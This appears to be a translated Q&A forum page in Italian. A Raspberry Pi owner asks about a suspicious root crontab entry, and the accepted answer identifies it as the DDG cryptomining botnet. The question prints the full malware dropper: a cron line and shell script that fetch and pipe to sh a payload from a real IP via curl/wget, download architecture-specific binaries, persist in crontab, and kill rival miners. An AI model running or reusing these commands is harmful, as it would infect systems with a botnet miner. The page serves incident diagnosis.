GNU/Linux >> Linux Esercitazione >  >> Linux

Voce di Crontab sospetta che esegue "xribfa4" ogni 15 minuti?

Volevo aggiungere qualcosa al mio file crontab di root sul mio Raspberry Pi e ho trovato una voce che mi sembra sospetta, la ricerca di parti di essa su Google non ha rivelato nulla.

Voce Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Il contenuto di http://103.219.112.66:8000/i.sh sono:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

La mia conoscenza di Linux è limitata, ma a me sembra che scaricare i binari da un server indonesiano ed eseguirli regolarmente come root non sia una cosa normale.

Cos'è questo? Cosa devo fare?

Risposta accettata:

È una botnet di mining DDG, come funziona:

  1. sfruttare una vulnerabilità RCE
  2. modifica del crontab
  3. scaricare il programma di mining appropriato (scritto con go)
  4. avvio del processo di mining

DDG:una botnet di mining mirata ai server di database

SystemdMiner quando una botnet prende in prestito l'infrastruttura di un'altra botnet

U&L :Come posso eliminare il malware miner su un'istanza AWS EC2? (server compromesso)


Linux

  1. Eseguire un cron job su Linux ogni sei ore

  2. Come eseguire crontab job ogni settimana di domenica

  3. crontab viene eseguito ogni 15 minuti tra determinate ore

  4. cron job occasionalmente non in esecuzione

  5. Esecuzione di Cron ogni 2 ore

Come eseguire Cron Jobs ogni 5, 10 o 15 minuti

Come eseguire un lavoro Crontab ogni settimana la domenica

HDDTemp crontab ogni ora nel file

Esempio Crontab – ogni 5 minuti

Come posso ottenere un cron job da eseguire ogni 30 minuti?

CronJob ogni 25 minuti